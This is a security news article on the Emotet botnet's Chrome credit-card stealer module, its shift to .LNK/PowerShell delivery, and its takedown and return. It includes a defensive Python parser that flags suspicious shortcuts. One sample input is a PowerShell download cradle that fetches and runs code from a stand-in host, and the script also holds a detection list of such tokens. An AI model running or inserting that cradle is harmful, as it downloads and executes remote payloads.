The Emotet botnet is now dropping a credit card stealer module that harvests payment card data stored in Google Chrome user profiles. The stolen details (cardholder name, expiration month and year, card number) are exfiltrated to command-and-control (C2) servers separate from the ones the module loader itself talks to.
“On June 6th, Proofpoint observed a new #Emotet module being dropped by the E4 botnet,” revealed the Proofpoint Threat Insights team. “To our surprise it was a credit card stealer that was solely targeting the Chrome browser. Once card details were collected they were exfiltrated to different C2 servers than the module loader.”
According to the Cryptolaemus security research group, this behavior shift follows a rise in Emotet activity during April and a switch to 64-bit modules. A week after that switch, Emotet began using Windows shortcut files (.LNK) to run PowerShell commands on victims' computers, moving away from Microsoft Office macros, which Microsoft began blocking by default for documents downloaded from the internet in early April 2022.
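The .LNK-to-PowerShell delivery mentioned above is easy to triage because a shortcut's target path and command-line arguments sit in fixed places of the Shell Link binary format (MS-SHLLINK). The following is an added example, written for this page and not code from Proofpoint, Cryptolaemus or the Emotet operators: it parses the header, the LocalBasePath inside LinkInfo and the StringData fields of a .LNK, then flags shortcuts whose target or arguments contain PowerShell launch and download-cradle indicators. The two sample shortcuts are constructed in the script itself (the "malicious" one carries a generic PowerShell download cradle, not Emotet's actual command line, which this article does not reproduce), and the indicator list is a heuristic chosen for the example rather than a published signature.

```python
import struct

# LinkFlags bits from the MS-SHLLINK specification (ShellLinkHeader.LinkFlags).
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

HEADER_SIZE = 0x4C
# CLSID {00021401-0000-0000-C000-000000000046} as it is stored on disk.
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

# Substrings that, in a shortcut's target or arguments, warrant a closer look.
# Heuristic list chosen for this example, not a published Emotet signature.
INDICATORS = ("powershell", "pwsh", "-windowstyle hidden", "-w hidden", "-noprofile",
              "-nop", "-encodedcommand", "-enc", "-executionpolicy bypass", "iex",
              "invoke-expression", "downloadstring", "frombase64string")


def _local_base_path(data, start):
    """Read LinkInfo.LocalBasePath (NUL-terminated ANSI) when the structure carries one."""
    _size, _hdr_size, li_flags, _vol_off, base_off = struct.unpack_from("<IIIII", data, start)
    if not li_flags & 0x1:  # VolumeIDAndLocalBasePath flag clear: no local path stored
        return ""
    end = data.index(b"\x00", start + base_off)
    return data[start + base_off:end].decode("cp1252")


def parse_lnk(data):
    """Return the target path and StringData fields of a Shell Link (.LNK) file.

    Only what is needed to recover the launched command is parsed: the fixed
    header, the LocalBasePath inside LinkInfo, and the StringData strings.
    LinkTargetIDList and LinkInfo are skipped using their own size fields.
    """
    if len(data) < HEADER_SIZE:
        raise ValueError("too short to be a .LNK")
    header_size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if header_size != HEADER_SIZE or clsid != LINK_CLSID:
        raise ValueError("not a Shell Link header")
    pos = HEADER_SIZE
    fields = {}
    if flags & HAS_LINK_TARGET_ID_LIST:
        (id_list_size,) = struct.unpack_from("<H", data, pos)
        pos += 2 + id_list_size
    if flags & HAS_LINK_INFO:
        (link_info_size,) = struct.unpack_from("<I", data, pos)
        fields["local_base_path"] = _local_base_path(data, pos)
        pos += link_info_size  # LinkInfoSize counts the size field itself
    unicode = bool(flags & IS_UNICODE)
    for bit, name in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                      (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                      (HAS_ICON_LOCATION, "icon_location")):
        if flags & bit:
            (count,) = struct.unpack_from("<H", data, pos)
            pos += 2
            nbytes = count * 2 if unicode else count
            raw = data[pos:pos + nbytes]
            pos += nbytes
            fields[name] = raw.decode("utf-16-le" if unicode else "cp1252")
    return fields


def suspicious_indicators(data):
    """Return the indicator substrings found in the shortcut's target path and arguments."""
    f = parse_lnk(data)
    text = " ".join(f.get(k, "") for k in ("local_base_path", "relative_path", "arguments")).lower()
    return [ind for ind in INDICATORS if ind in text]


def build_lnk(target_path, arguments):
    """Assemble a minimal spec-shaped .LNK; used here only to construct sample input."""
    base = target_path.encode("cp1252") + b"\x00"
    volume_id = struct.pack("<IIII", 0x11, 3, 0, 0x10) + b"\x00"  # fixed drive, empty label
    vol_off = 0x1C                      # LinkInfo header is 0x1C bytes
    base_off = vol_off + len(volume_id)
    suffix_off = base_off + len(base)
    link_info = struct.pack("<IIIIIII", suffix_off + 1, 0x1C, 0x1, vol_off, base_off, 0, suffix_off)
    link_info += volume_id + base + b"\x00"  # CommonPathSuffix: empty string
    flags = HAS_LINK_INFO | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", HEADER_SIZE, LINK_CLSID, flags,
                         0x20, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)
    string_data = struct.pack("<H", len(arguments)) + arguments.encode("utf-16-le")
    return header + link_info + string_data


# Constructed samples: a generic PowerShell download cradle (not Emotet's real
# command line, which this article does not reproduce) and a harmless shortcut.
SAMPLE_MALICIOUS = build_lnk(
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "-WindowStyle Hidden -NoProfile -Command \"IEX (New-Object Net.WebClient)"
    ".DownloadString('http://example.invalid/stage2')\"")
SAMPLE_BENIGN = build_lnk(r"C:\Windows\System32\notepad.exe", "")

if __name__ == "__main__":
    for label, blob in (("malicious", SAMPLE_MALICIOUS), ("benign", SAMPLE_BENIGN)):
        print(label, parse_lnk(blob), suspicious_indicators(blob))
```

Two caveats for real-world use: the target of a shortcut can also live only in the LinkTargetIDList (which this parser skips rather than decodes), so a shortcut with no LinkInfo and no RelativePath will show no target at all, and short substrings such as "iex" will occasionally match benign text, so treat the hit list as a triage signal rather than a verdict.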
Emotet first appeared in 2014 as a banking trojan. The TA542 threat group (also tracked as Mummy Spider) now operates it as a botnet for distributing second-stage payloads; it also lets the operators steal user data, reconnoiter compromised networks, and move laterally to other vulnerable devices.
Emotet is infamous for dropping the Qbot and TrickBot trojans on infected machines, which in turn install further malware such as Cobalt Strike beacons and ransomware like Ryuk and Conti. Emotet's infrastructure was taken down in early 2021 in an international law enforcement operation that also led to the arrest of two people. On April 25th, 2021, German law enforcement turned Emotet's own infrastructure against the botnet, pushing a module that uninstalled the malware from compromised devices.
The botnet resurfaced in November 2021, when the Emotet research group Cryptolaemus, security firm GData, and cybersecurity company Advanced Intel spotted TrickBot being used to deliver an Emotet loader, with Emotet piggybacking on TrickBot's existing infrastructure. Since the beginning of this year Emotet has seen a tremendous spike in activity, according to ESET, "with its activity growing more than 100-fold vs T3 2021."